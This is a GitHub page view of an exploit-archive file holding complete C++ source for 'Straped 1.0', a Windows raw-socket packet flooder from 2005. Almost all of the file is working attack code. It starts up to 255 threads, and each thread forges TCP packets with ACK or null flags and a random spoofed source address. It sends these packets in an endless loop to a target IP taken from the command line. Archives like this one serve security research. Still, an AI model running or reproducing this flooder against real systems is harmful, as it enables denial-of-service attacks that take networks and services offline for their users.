forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path1072.cpp
More file actions
executable file
·218 lines (192 loc) · 7.72 KB
/
Copy path1072.cpp
File metadata and controls
executable file
·218 lines (192 loc) · 7.72 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
/**
Straped 1.0 author: Marco Del Percio 20/05/2005
Remember: this is a mulithreaded program! MSVC++ compile with /MT.
Remember: This program requires raw socket support! You can't use it on Windows XP SP2 and
if you've done MS05-019 update you'll have to re-enable raw socket support! (If you still can)
see http://seclists.org/lists/nmap-hackers/2005/Apr-Jun/0001.htm for info about this.
levante at manicomio.org
*/
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <stdio.h>
#include <ws2tcpip.h>
#include <string.h>
#include <process.h>
#pragma comment(lib, "ws2_32")
/* Global variables */
WSADATA wsa;
int delay = 1;
BOOL flag = TRUE;
HANDLE TIARRAY[256];
unsigned int target;
unsigned char attackType;
/* IP header structure */
struct ip_hdr {
unsigned char ip_hl:4, ip_v:4;
unsigned char ip_tos;
unsigned short ip_len;
unsigned short ip_id;
unsigned short ip_off;
unsigned char ip_ttl;
unsigned char ip_p;
unsigned short ip_sum;
unsigned int ip_src;
unsigned int ip_dst;
};
/* TCP header structure */
struct tcp_hdr {
unsigned short th_sport;
unsigned short th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_x2:4, th_off:4;
unsigned char th_flags;
unsigned short th_win;
unsigned short th_sum;
unsigned short th_urp;
};
#define TOTAL_LEN (sizeof(struct ip_hdr) + sizeof(struct tcp_hdr))
void flood(void *id); /* Thread flood function */
/* A common checksum function */
unsigned short checksum(unsigned short *buffer, int size) {
unsigned long cksum=0;
while(size > 1) {
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if(size)
cksum += *(unsigned char*)buffer;
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >> 16);
return (unsigned short)(~cksum);
}
int main(int argc, char *argv[]) {
int i = 0, nthreads = 1;
if( argc != 5) {
printf("\nStraped 1.0 Mix of stream/raped attack ported to Windows by LeVante^\n\nUse:\n%s <target IP> <delay(ms)> <tcp flags: ack|null> <number of threads>\n",argv[0]);
exit(1);
}
if(WSAStartup(MAKEWORD(2,1),&wsa)) {
fprintf(stderr, "\nError! WSAStartup failed!\n");
exit(1);
}
/* Target Ip and type of attack (tcp flags) are shared between threads since they're global */
target = inet_addr(argv[1]);
delay = atoi(argv[2]);
if(!strcmp(argv[3],"ack"))
attackType = 0x00000010;
else if(!strcmp(argv[3],"null"))
attackType = 0x00000000;
else {
fprintf(stderr, "\nError! Tcp flags MUST be \"ack\" or \"null\".\n");
WSACleanup();
exit(1);
}
nthreads = atoi(argv[4]);
/* No more than 256 threads allowed */
if(nthreads <=0 || nthreads > 255) {
fprintf(stderr, "\nError! Number of threads must be between 1 and 256\n");
WSACleanup();
exit(1);
}
for(i=0;i<nthreads;i++) {
TIARRAY[i] = CreateMutex(NULL, FALSE, NULL);
/* The ID of each thread is the only argument passed to the thread function (as a void *) */
_beginthread( flood, 0, (void *) i);
}
Sleep(100);
printf("\nPacket flooding %s with %d threads...\n", argv[1], nthreads);
//just wait
WaitForMultipleObjects(nthreads, TIARRAY, TRUE, INFINITE);
return 0;
}
void flood(void *id) {
SOCKET sock;
int delay = 1;
unsigned char packet[4096];
struct sockaddr_in sin;
unsigned short pseudo[32], seg_length = 20;
unsigned char one,two,three,four, *ptr;
unsigned char spoofed_address[7];
struct ip_hdr *ip = (struct ip_hdr *) packet;
struct tcp_hdr *tcp = (struct tcp_hdr *) (packet + 20);
WaitForSingleObject(TIARRAY[(int)id], INFINITE);
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
fprintf(stderr, "\nThread with ID %d was unable to open socket\n", (int)id);
_endthread();
}
sin.sin_family = AF_INET;
sin.sin_port = htons(135); //this will be changed with a random port
sin.sin_addr.s_addr = target;
memset(packet, 0, 4096);
ip->ip_hl = 5;
ip->ip_v = 4;
ip->ip_tos = 0;
ip->ip_len = htons(TOTAL_LEN);
ip->ip_id = htons((USHORT)rand());
ip->ip_off = 0;
ip->ip_ttl = 128;
ip->ip_p = 6;
ip->ip_sum = 0;
ip->ip_src = target;
ip->ip_dst = sin.sin_addr.s_addr;
tcp->th_sport = htons((USHORT)rand()); /* Random source/destination port */
tcp->th_dport = htons((USHORT)rand());
tcp->th_seq = htonl(rand());
tcp->th_ack = htonl(0);
tcp->th_x2 = 0;
tcp->th_off = 5;
tcp->th_flags = attackType; /* either ack or no flags set */
tcp->th_win = htons(16384);
tcp->th_sum = 0;
tcp->th_urp = 0;
ip->ip_sum = checksum((unsigned short *) packet, 20);
ptr = (unsigned char *)pseudo;
/* These passages were NOT coded by me. They're from Sahir Hidayatullah. These statements are based on hard coded offsets of the various fields from the start of the datagram */
memset(pseudo,0,32); // Zero out the pseudo-header
memcpy(ptr,packet+20,20); // Copy in the tcp header
memcpy((ptr+20),packet+12,4); // Source IP
memcpy((ptr+24),packet+16,4); // Dest IP
memcpy((ptr+29),packet+9,1); // 8bit zero + Protocol
memset((ptr+31),20,1);
tcp->th_sum = checksum(pseudo, 32);
if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) < 0) {
fprintf(stderr, "\nError! Thread with ID %d was unable to set IP_HDRINCL option\n", (int)id);
closesocket(sock);
_endthread();
}
while(1){
/* Each cycle generate a random source IP address, a random source/destination port, a random sequence number and a random IP id
then recalculate checksum both for IP and TCP and finally sends out the packet */
ptr = NULL;
sin.sin_port = htons((USHORT)rand());
one = rand() % 256;
two = rand() % 256;
three = rand() % 256;
four = rand() % 256;
sprintf(spoofed_address,"%d.%d.%d.%d\0",one,two,three,four);
ip->ip_src = inet_addr(spoofed_address);
ip->ip_id = htons((USHORT)rand());
ip->ip_sum = 0;
ip->ip_sum = checksum((unsigned short *) packet, 20);
tcp->th_sport = htons((USHORT)rand());
tcp->th_dport = htons((USHORT)rand());
tcp->th_seq = htonl(rand());
tcp->th_sum=0;
/* Same passages for re-calculating pseudo-header. */
ptr = (unsigned char *)pseudo;
memset(pseudo,0,32);
memcpy(ptr,packet+20,20);
memcpy((ptr+20),packet+12,4);
memcpy((ptr+24),packet+16,4);
memcpy((ptr+29),packet+9,1);
memset((ptr+31),20,1);
tcp->th_sum = checksum(pseudo, 32);
/* Sends out the datagram. 40 bytes is the sum of IP and TCP header length */
if(sendto(sock,packet,40,0,(struct sockaddr *) &sin, sizeof(sin)) < 0)
printf ("Thread with ID %d. Error while sending the packet: %d\n", (int)id, WSAGetLastError());
if(delay)
Sleep(delay);
}
}
// milw0rm.com [2005-06-27]